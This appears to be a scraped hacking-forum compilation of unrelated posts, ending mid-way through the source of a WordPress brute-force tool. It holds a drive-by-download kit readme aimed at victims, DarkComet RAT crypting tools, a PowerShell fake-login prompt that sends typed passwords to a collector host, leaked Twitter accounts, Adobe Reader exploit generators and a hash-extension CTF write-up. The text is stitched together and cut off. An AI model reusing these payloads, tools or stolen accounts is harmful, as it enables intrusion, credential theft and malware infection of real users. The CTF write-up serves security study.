Fi8sVrs

Size: 32,04 MB Speedtest.net Clone - The Global Broadband Speed Test Script The ultimate fully customizable Speed Test application for your website. Easy to install and ready in a few minutes. Measures bandwidth up to Gb/s. Test statistics database, advanced VoIP test and much more are available. Demo Download speedtest.net.rar (32,04 MB) - uploaded.net Source: nulled

This video demonstrates how to make a darkcomet rat undetectable. P.S. these are the names of tools needed for it to work: [C#] Source Code Generator V4.0 Final DeepSea Obfuscator.v4.0.1.16.full DNGuard HVM.Enterprise 3.60 cracked-SND DarkComet Version 5.3.1 Microsoft visual studio

Readme: Step 1.) Open game.java and change fileLink to a link to a ZIPPED file that you want to download and execute to the remote pc.. Step 2.) whilst still in game.java change fileDir to the directory of the computer where you want to download your application to. Step 3.) Find out what JDK version you have and edit the three .bat files to correspond to your JDK version - Example: "C:\Program Files\Java\jdk1.6.0_16\bin\javac.exe" -cp . *.java This shows my version of JDK is 1.6.0_16 if you go to 'C:\Program Files\Java\' and see what version of jdk you had e.g. 1.6.0_21 you would change the three files so that it was like so: "C:\Program Files\Java\jdk1.6.0_21\bin\javac.exe" Step 4.) Run Compile.bat if no errors show then proceed to step 5. Step 5.) Run Make JAR-FILE.bat Step 6.) Run 'SIGN YOUR JAR.bat' and when prompted enter the password 'java123' it will not show your typing but it will be there after typing 'java123' hit enter. Step 7.) Upload yourfile.zip, Client.html, and Client.jar to a webhost, and then send people to http://yourlink.com/Client.html to execute the Drive By Download on them. Download

As many of you know, last weekend was Ghost in the Shellcode 2015! There were plenty of fun challenges, and as always I had a great time competing! This will be my first of four writeups, and will be pretty simple (since it simply required me to use a tool that already exists (and that I wrote) The level was called "knockers". It's a simple python script that listens on an IPv6 UDP port and, if it gets an appropriately signed request, opens one or more other ports. The specific challenge gave you a signed token to open port 80, and challenged you to open up port 7175. The service itself listened on port 8008 ("BOOB", to go with the "knockers" name). You can download the original level here (Python). # python2 pleaseimport sys import struct import hashlib import os from binascii import hexlify, unhexlify import SocketServer import socket try: from fw import allow except ImportError: def allow(ip,port): print 'allowing host ' + ip + ' on port ' + str(port) PORT = 8008 g_h = hashlib.sha512 g_key = None def generate_token(h, k, *pl): m = struct.pack('!'+'H'*len(pl), *pl) mac = h(k+m).digest() return mac + m def parse_and_verify(h, k, m): ds = h().digest_size if len(m) < ds: return None mac = m[:ds] msg = m[ds:] if h(k+msg).digest() != mac: return None port_list = [] for i in range(0,len(msg),2): if i+1 >= len(msg): break port_list.append(struct.unpack_from('!H', msg, i)[0]) return port_list class KnockersRequestHandler(SocketServer.BaseRequestHandler): def handle(self): global g_key data, s = self.request print 'Client: {} len {}'.format(self.client_address[0],len(data)) l = parse_and_verify(g_h, g_key, data) if l is None: print 'bad message' else: for p in l: allow(self.client_address[0], p) class KnockersServer(SocketServer.UDPServer): address_family = socket.AF_INET6 def load_key(): global g_key f=open('secret.txt','rb') g_key = unhexlify(f.read()) f.close() def main(): global g_h global g_key g_h = hashlib.sha512 if len(sys.argv) < 2: print '''Usage: --- Server --- knockers.py setup Generates a new secret.txt knockers.py newtoken port [port [port ...]] Generates a client token for the given ports knockers.py serve Runs the service --- Client --- knockers.py knock <host> <token> Tells the server to unlock ports allowed by the given token ''' elif sys.argv[1]=='serve': load_key() server = KnockersServer(('', PORT), KnockersRequestHandler) server.serve_forever(); elif sys.argv[1]=='setup': f = open('secret.txt','wb') f.write(hexlify(os.urandom(16))) f.close() print 'wrote new secret.txt' elif sys.argv[1]=='newtoken': load_key() ports = map(int,sys.argv[2:]) print hexlify(generate_token(g_h, g_key, *ports)) elif sys.argv[1]=='knock': ai = socket.getaddrinfo(sys.argv[2],PORT,socket.AF_INET6,socket.SOCK_DGRAM) if len(ai) < 1: print 'could not find address: ' + sys.argv[2] return family, socktype, proto, canonname, sockaddr = ai[0] s = socket.socket(family, socktype, proto) s.sendto(unhexlify(sys.argv[3]), sockaddr) else: print 'unrecognized command' if __name__ == '__main__': main() The vulnerability To track down the vulnerability, let's have a look at the signature algorithm: def generate_token(h, k, *pl): m = struct.pack('!'+'H'*len(pl), *pl) mac = h(k+m).digest() return mac + m In that function, h is a hash function (sha-512, specifically), k is a random 16-byte token, randomly generated, and m is an array of 16-bit representation of the ports that the user wishes to open. So if the user wanted to open port 1 and 2, they'd send "\x00\x01\x00\x02", along with the appropriate token (which the server administrator would have to create/send, see below). Hmm... it's generating a mac-protected token and string by concatenating strings and hashing them? If you've followed my blog, this might sound very familiar! This is a pure hash extension vulnerability! I'm not going to re-iterate what a hash extension vulnerability is in great detail—if you're interested, check out the blog I just linked—but the general idea is that if you generate a message in the form of msg + H(secret + msg), the user can arbitrarily extend the message and generate a new signature! That means if we have access to any port, we have access to every port! Let's see how! Generating a legit token To use the python script linked above, first run 'setup': $ python ./knockers.py setup wrote new secret.txt Which generates a new secret. The secret is just a 16-byte random string that's stored on the server. We don't really need to know what the secret is, but for the curious, if you want to follow along and verify your numbers against mine, it's: $ cat secret.txt 2b396fb91a76307ce31ef7236e7fd3df Now we use the tool (on the same host as the secret.txt file) to generate a token that allows access on port 80: $ python ./knockers.py newtoken 80 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050 Notice the first 512 bits (64 bytes) is the signature—which is logical, since it's sha512—and the last 16 bits (2 bytes) are 0050, which is the hex representation of 80. We'll split those apart later, when we run hash_extender, but for now let's make sure the token actually works first! We start the server: $ python ./knockers.py serve And in another window, or on another host if you prefer, send the generated token: $ python ./knockers.py knock localhost 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb20050 In the original window, you'll see that it was successful: $ python ./knockers.py serve Client: ::1 len 66 allowing host ::1 on port 80 Now, let's figure out how to create a token for port 7175! Generating an illegit (non-legit?) token So this is actually the easiest part. It turns out that the awesome guy who wrote hash_extender (just kidding, he's not awesome) built in everything you needed for this attack! Download and compile hash_extender if needed (definitely works on Linux, but I haven't tested on any other platforms—testers are welcome!), and run it with no arguments to get the help dump. You need to pass in the original data (that's "\x00\x80"), the data you want to append (7175 => "\x1c\x07"), the original signature, and the length of the secret (which is 16 bytes). You also need to pass in the types for each of the parameters ("hex") in case the defaults don't match (in this case, they don't—the appended data is assumed to be raw). All said and done, here's the command: ./hash_extender --data-format hex --data 0050 \ --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 \ --append "1c07" --append-format hex \ -l 16 You can pass in the algorithm and the desired output format as well, if we don't, it'll just output in every 512-bit-sized hash type. The output defaults to hex, so we're happy with that. $ ./hash_extender --data-format hex --data 0050 --signature-format hex --signature 83a98996f0acb4ad74708447b303c081c86d0dc26822f4014abbf4adcbc4d009fbd8397aad82618a6d45de8d944d384542072d7a0f0cdb76b51e512d88de3eb2 --append "1c07" --append-format hex -l 16 Type: sha512 Secret length: 16 New signature: 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894 New string: 005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07 [strike] Type: whirlpool Secret length: 16 New signature: f4440caa0da933ed497b3af8088cb78c49374853773435321c7f03730386513912fb7b165121c9d5fb0cb2b8a5958176c4abec35034c2041315bf064de26a659 New string: 0050800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07[/strike] Ignoring the whirlpool token, since that's the wrong algorithm, we now have a new signature and a new string. We can just concatenate them together and use the built-in client to use them: $ python ./knockers.py knock localhost 4bda887c0fc43636f39ff38be6d592c2830723197b93174b04d0115d28f0d5e4df650f7c48d64f7ca26ef94c3387f0ca3bf606184c4524600557c7de36f1d894005080000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000901c07 And checking our server, we see a ton of output, including successfully opening port 7175: $ python ./knockers.py serve Client: ::1 len 66 allowing host ::1 on port 80 Client: ::1 len 178 allowing host ::1 on port 80 allowing host ::1 on port 32768 allowing host ::1 on port 0 allowing host ::1 on port 0 [...repeated like 100 times...] allowing host ::1 on port 0 allowing host ::1 on port 0 allowing host ::1 on port 144 allowing host ::1 on port 7175 And that's it! At that point, you can visit http://knockers.2015.ghostintheshellcode.com:7175 and get the key. Source skullsecurity

Metasploit Minute has entered into it’s 3rd “season”. And we kick it off with using the Metasploit capture modules to capture creds from this powershell popup. The cool thing about this is you can leave it to execute on a system without any other code on disk and get creds constantly as any level of user. No admin, no UAC bypass needed. Just a bunch of creds for free.. over SSL. ;–) Here is the video: Here is the code: $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[system.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};$wc = new-object net.webclient; $wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)"); $wc.Proxy = [system.Net.WebRequest]::DefaultWebProxy; $wc.Proxy.Credentials = [system.Net.CredentialCache]::DefaultNetworkCredentials; $wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, ''); $result = $wc.downloadstring('https://172.16.102.163'); Lets break down the code line by line: $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserName,[Environment]::UserDomainName);This tells windows to prompt for credentials, with the title of “Failed Authentication”, no info in the comment (so it uses default), and include the username and domain in the box to add authenticity. Thats where all the magic is, everything else is just gravy. [system.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};Tells powershell not to verify SSL certificates (allows us to use self signed certs in the HTTPS transaction later $wc = new-object net.webclient;$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)"); Creates a new webclient object and sets its user agent to ‘wget’ Creates a new webclient object and sets its user agent to ‘wget’Tells powershell to use whatever proxy the current user uses with whatever credentials they have cached. If one or both are unnecessary it just ignores these settings. $wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');Tells powershell that the HTTP-Basic credentials to use are the ones typed in the popup box recently by the user. $result = $wc.downloadstring('https://172.16.102.163');And finally the request to HTTP-Basic capture module in metasploit, but you could have anything you want capture these creds. cat power.txt | iconv --to-code UTF-16LE | base64JABjAHIAZQBkACAAPQAgACQAaABvAHMAdAAuAHUAaQAuAHAAcgBvAG0AcAB0AGYAbwByAGMAcgBlAGQAZQBuAHQAaQBhAGwAKAAnAEYAYQBpAGwAZQBkACAAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuACcALAAnACcALABbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBVAHMAZQByAEQAbwBtAGEAaQBuAE4AYQBtAGUAIAArACAAIgBcACIAIAArACAAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBOAGEAbQBlACwAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVQBzAGUAcgBEAG8AbQBhAGkAbgBOAGEAbQBlACkAOwAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AOwAKACQAdwBjACAAPQAgAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ADsACgAkAHcAYwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAVQBzAGUAcgAtAEEAZwBlAG4AdAAiACwAIgBXAGcAZQB0AC8AMQAuADkAKwBjAHYAcwAtAHMAdABhAGIAbABlACAAKABSAGUAZAAgAEgAYQB0ACAAbQBvAGQAaQBmAGkAZQBkACkAIgApADsACgAkAHcAYwAuAFAAcgBvAHgAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEQAZQBmAGEAdQBsAHQAVwBlAGIAUAByAG8AeAB5ADsACgAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAGUAZABlAG4AdABpAGEAbABzADsACgAkAHcAYwAuAGMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAD0AIABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAcwB5AHMAdABlAG0ALgBuAGUAdAAuAG4AZQB0AHcAbwByAGsAYwByAGUAZABlAG4AdABpAGEAbAAoACQAYwByAGUAZAAuAHUAcwBlAHIAbgBhAG0AZQAsACAAJABjAHIAZQBkAC4AZwBlAHQAbgBlAHQAdwBvAHIAawBjAHIAZQBkAGUAbgB0AGkAYQBsACgAKQAuAHAAYQBzAHMAdwBvAHIAZAAsACAAJwAnACkAOwAKACQAcgBlAHMAdQBsAHQAIAA9ACAAJAB3AGMALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADcAMgAuADEANgAuADEAMAAyAC4AMQA2ADMAJwApADsACgA= Then execute powershell -ep bypass -enc <the encoded text from above> and you get this: Image should be here: root@wpad:~/metasploit-framework# ./msfconsole -Lqmsf > use auxiliary/server/capture/http_basic msf auxiliary(http_basic) > show options Module options (auxiliary/server/capture/http_basic): Name Current Setting Required Description ---- --------------- -------- ----------- REALM Secure Site yes The authentication realm you'd like to present. RedirectURL no The page to redirect users to after they enter basic auth creds SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 80 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) URIPATH no The URI to use for this exploit (default is random) msf auxiliary(http_basic) > set SSL true SSL => true msf auxiliary(http_basic) > set SRVPORT 443 SRVPORT => 443 msf auxiliary(http_basic) > set URIPATH / URIPATH => / msf auxiliary(http_basic) > run [*] Auxiliary module execution completed msf auxiliary(http_basic) > [*] Listening on 0.0.0.0:443... [*] Using URL: https://0.0.0.0:443/ [*] Local IP: https://172.16.102.163:443/ [*] Server started. [*] 172.16.102.140 http_basic - Sending 401 to client 172.16.102.140 [+] 172.16.102.140 - Credential collected: "SITTINGDUCK\user:ASDqwe123" => / Source: room362

aprox 2.5k conturi twitter worlwide Download: OrhDWPZlVi3zO92C05IBLr3l4GfD3q1sdDMs rc4 key https://rstforums.com/forum/100971-conturi-twitter.rst

This archive contains 174 exploits that were added to Packet Storm in April, 2015. 1504-exploits/ 1504-exploits/wpwoocommerceaa-shelldisclose.txt 1504-exploits/emailmarkerter-xss.txt 1504-exploits/projectsend561-xsrf.txt 1504-exploits/nodesstudio-sqlxssdiscose.txt 1504-exploits/wpsam-disclose.txt 1504-exploits/VL-1314.txt 1504-exploits/VL-1227.txt 1504-exploits/airties-exec.txt 1504-exploits/oracledotcom-xss.txt 1504-exploits/prolink-xsrf.txt 1504-exploits/PRL-2015-05.tgz 1504-exploits/wpphpec-upload.txt 1504-exploits/AS-WFTP0328.txt 1504-exploits/hippocms-crlf.txt 1504-exploits/bloofoxcms050-xss.txt 1504-exploits/wpbusinessintelligence-sql.txt 1504-exploits/wpthecartpress-xsslfi.txt 1504-exploits/netgearwnr2000v4-xssexec.txt 1504-exploits/SpiritSploit.py.txt 1504-exploits/ms15-034.txt 1504-exploits/mediasuitecms-disclose.txt 1504-exploits/proftpd135-filecopy.txt 1504-exploits/6kbbs80-xss.txt 1504-exploits/cve-2014-7822_poc.c 1504-exploits/proftpd135-exec.txt 1504-exploits/wpallinone-sql.txt 1504-exploits/multi_ncc_ping_exec.rb.txt 1504-exploits/phplist3010-insecure.txt 1504-exploits/6kbbs-sql.txt 1504-exploits/0xb16b00b5.tgz 1504-exploits/adbbackup-traversal.txt 1504-exploits/netcatcms-traversal.txt 1504-exploits/wp42-xss.txt 1504-exploits/fedoraabrt-racecondition.txt 1504-exploits/oraclehyperionsmart-dos.txt 1504-exploits/VL-1311.txt 1504-exploits/wpfusionengage-disclose.txt 1504-exploits/VL-1322.txt 1504-exploits/wpnexforms-sql.txt 1504-exploits/landesk-rfixsrf.txt 1504-exploits/VL-1445.txt 1504-exploits/wp_wpshop_ecommerce_file_upload.rb.txt 1504-exploits/wp_inboundio_marketing_file_upload.rb.txt 1504-exploits/honeywell-traversal.txt 1504-exploits/VL-1455.txt 1504-exploits/adobe_flash_casi32_int_overflow.rb.txt 1504-exploits/proverbswebcal212-xss.txt 1504-exploits/wtknetwork-sql.txt 1504-exploits/kemploadmaster-execxsrfxssdos.txt 1504-exploits/wpduplicator-sqlxsrf.txt 1504-exploits/VL-1215.txt 1504-exploits/wp_worktheflow_upload.rb.txt 1504-exploits/rootpipe.rb.txt 1504-exploits/6kbbs80-xsrf.txt 1504-exploits/fmp3cr2628-overflow.txt 1504-exploits/wpyoastgs-xss.txt 1504-exploits/ninja-racecondition.txt 1504-exploits/opointmedia-openredirect.txt 1504-exploits/wp_nmediawebsite_file_upload.rb.txt 1504-exploits/texttospeech-xss.txt 1504-exploits/wpnexforms3-sql.txt 1504-exploits/nasagov-xss.txt 1504-exploits/sambaopenldap-xss.txt 1504-exploits/wpcontentslide-xssxsrf.txt 1504-exploits/wpsam-upload.txt 1504-exploits/freepbx-xss.txt 1504-exploits/pligg202-xss.txt 1504-exploits/ZSL-2015-5240.txt 1504-exploits/netcatcms-inject.txt 1504-exploits/phpsfp-sql.txt 1504-exploits/ZSL-2015-5238.txt 1504-exploits/wptunelibrary154-sql.txt 1504-exploits/testdisk-overflow.txt 1504-exploits/websid-xss.txt 1504-exploits/wpshareaholic-xss.txt 1504-exploits/cpx_proftp.py.txt 1504-exploits/huaweiseqanalyst-xss.txt 1504-exploits/jaws111-xsrf.txt 1504-exploits/wpmon-disclose.txt 1504-exploits/untangle-xssdisclose.txt 1504-exploits/samsungipolis-exec.txt 1504-exploits/orangehrm321411-sqlxss.txt 1504-exploits/jboss_seam_upload_exec.rb.txt 1504-exploits/netsol_web_mail.pdf 1504-exploits/SA-20150409-0.txt 1504-exploits/VL-1444.txt 1504-exploits/edruttmsdpim-traversalfile.txt 1504-exploits/zenworks-exectraversal.txt 1504-exploits/hotexbilling-xss.txt 1504-exploits/osxrootpipe-escalate.txt 1504-exploits/miniupnpd-overflow.txt 1504-exploits/wprevolutionslider-shell.txt 1504-exploits/ossolution-sql.txt 1504-exploits/VL-1228.txt 1504-exploits/wpdesignfolio-shell.txt 1504-exploits/wpcommunityevents135-sql.txt 1504-exploits/thehunter.txt 1504-exploits/CORE-2015-0008.txt 1504-exploits/solarwinds_fsm_userlogin.rb.txt 1504-exploits/phptraffica23-xss.txt 1504-exploits/pimcorecms305-xsrf.txt 1504-exploits/wolfcms082-shell.txt 1504-exploits/otrs31x-xss.txt 1504-exploits/php-typeconfusion.txt 1504-exploits/avsarsoftmatbaa-shellxss.txt 1504-exploits/wooframework451-xss.txt 1504-exploits/joomlasimplephotogallery-shell.txt 1504-exploits/ubuntuusbcreator-escalate.txt 1504-exploits/wp_creativecontactform_file_upload.rb.txt 1504-exploits/weebly-hijack.txt 1504-exploits/wpultimatenewspaper-xss.txt 1504-exploits/wpvvci-shell.txt 1504-exploits/PRL-2015-04.tgz 1504-exploits/idm6-dllhijack.txt 1504-exploits/Mac-OS-X_Fat-DoS.c 1504-exploits/openletters-inject.txt 1504-exploits/encapsflashgallery-dos.txt 1504-exploits/VL-1438.txt 1504-exploits/adobe_flash_copy_pixels_to_byte_array.rb.txt 1504-exploits/flatpress10-xss.txt 1504-exploits/SA-20150410-0.txt 1504-exploits/synology-xss.txt 1504-exploits/VL-1453.txt 1504-exploits/wp_slideshowgallery_upload.rb.txt 1504-exploits/edruttmsdprv-xss.txt 1504-exploits/edruttmsdp-redirect.txt 1504-exploits/VL-1474.txt 1504-exploits/wpsam-sql.txt 1504-exploits/ZSL-2015-5242.txt 1504-exploits/VL-1452.txt 1504-exploits/javacom-xss.txt 1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt 1504-exploits/safari-crossdomain.txt 1504-exploits/SGMA15-002.txt 1504-exploits/VL-1359.txt 1504-exploits/comsenzsupesitecms70-xss.txt 1504-exploits/eceprojects-xss.txt 1504-exploits/apachespark-exec.txt 1504-exploits/ceragon_fibeair_known_privkey.rb.txt 1504-exploits/wpcitizenspace-xss.txt 1504-exploits/VL-1447.txt 1504-exploits/edruttmsdp-xss.txt 1504-exploits/ceragonfibeair-disclose.txt 1504-exploits/zyxel-dos.txt 1504-exploits/huaweiseqanalyst-xxe.txt 1504-exploits/wpqaengine-escalate.txt 1504-exploits/apportabrt-exec.txt 1504-exploits/qlik-redirect.txt 1504-exploits/wpvideogallery28-sql.txt 1504-exploits/pyscripter-dllhijack.txt 1504-exploits/bluedragon-traversal.txt 1504-exploits/meela-xss.txt 1504-exploits/unipdf12-overflow.txt 1504-exploits/wpworktheflow252-shell.txt 1504-exploits/VL-1446.txt 1504-exploits/soapfault-typeconfusion.txt 1504-exploits/wpnmediawcf-shell.txt 1504-exploits/mefa-xss.txt 1504-exploits/goautodial-execsqlupload.txt 1504-exploits/ZSL-2015-5239.txt 1504-exploits/ZSL-2015-5241.txt 1504-exploits/wpseopack180-shell.txt 1504-exploits/wpstatistics912-xss.txt 1504-exploits/wpvvp-shell.txt 1504-exploits/xoops2571-xss.txt 1504-exploits/androidbackupagent-exec.txt 1504-exploits/apportabrt-issues.txt 1504-exploits/freebsdkey-disclose.txt 1504-exploits/legend_rce.py.txt 1504-exploits/wpwdippu-upload.txt 1504-exploits/wp_reflexgallery_file_upload.rb.txt 1504-exploits/libarchive-dos.tgz 1504-exploits/log2space62-xss.txt 1504-exploits/wpajaxstorelocator-sql.txt tar: 1504-exploits/wpajaxstorelocator-sql.txt: time stamp 2015-05-16 05:33:33 is 1279061.268089756 s in the future Download

Here is adobe reader expls CVE-2011-2462 and 2 different verions of CVE-2010-2883 all codes is pythons usage for cve2011-4262 : createExploitPDF.py http://example.com/bin/bad.exe usage for CVE-2010-2883 : [input_file.exe] [output_file.pdf] adobe.rar — RGhost — file sharing List of files File name Size Compressed Ratio adobe/createExploitPDF.py 32.2 KB 5.93 KB 18.425% adobe/PDF2883v2.py 414 KB 128 KB 30.835% adobe/PDF2883v3.py 665 KB 202 KB 30.306% adobe Source: opensc

Dropbox launches bug hunter bounty programme from $216 a flaw

This is a python script that performs brute forcing against WordPress installs using a wordlist. WordPress Brute Force by Claudio Viviani Inspired by xSecurity's WordPress Brute Muliththreading Tested on Wordpress 3.x and 4.x Disclaimer: This tool is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this exploit. In any case you disagree with the above statement,stop here. Requirements: python's httplib2 lib Installation: pip install httplib2 Features: Multithreading xml-rpc brute force mode http and https protocols support Random User Agent CHANGELOG: 2015-04-12 v2.0 Add new feature xml-rpc brute force mode Fix minor bugs 2015-04-11 v1.1 optparse (Deprecated since version 2.7) replaced by argparse Fix connection bugs Download: #!/usr/bin/env python# # WordPress Brute Force by Claudio Viviani # # Inspired by xSecurity's WordPress Brute Muliththreading # # Tested on Wordpress 3.x and 4.x # # Disclaimer: # # This tool is intended for educational purposes only and the author # can not be held liable for any kind of damages done whatsoever to your machine, # or damages caused by some other,creative application of this exploit. # In any case you disagree with the above statement,stop here. # # Requirements: # # 1) python's httplib2 lib # Installation: pip install httplib2 # # Features: # # 1) Multithreading # 2) xml-rpc brute force mode # 3) http and https protocols support # 4) Random User Agent # # CHANGELOG: # # 2015-04-12 v2.0 # 1) Add new feature xml-rpc brute force mode # 2) Fix minor bugs # # 2015-04-11 v1.1 # 1) optparse (Deprecated since version 2.7) replaced by argparse # 2) Fix connection bugs # # import urllib, httplib, httplib2 import socket, sys, os, os.path, argparse, random from threading import Thread from time import sleep banner = """ ___ ___ __ | Y .-----.----.--| .-----.----.-----.-----.-----. |. | | _ | _| _ | _ | _| -__|__ --|__ --| |. / \ |_____|__| |_____| __|__| |_____|_____|_____| |: | |__| |::.|:. | `--- ---' _______ __ _______ | _ .----.--.--| |_.-----| _ .-----.----.----.-----. |. 1 | _| | | _| -__|. 1___| _ | _| __| -__| |. _ |__| |_____|____|_____|. __) |_____|__| |____|_____| |: 1 \ |: | |::.. . / |::.| `-------' `---' W0rdBRUTEpr3ss v2.0 Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch http://ffhd.homelab.it (Free Fuzzy Hashes Database) https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ def randomAgentGen(): userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4', 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36', 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36', 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) 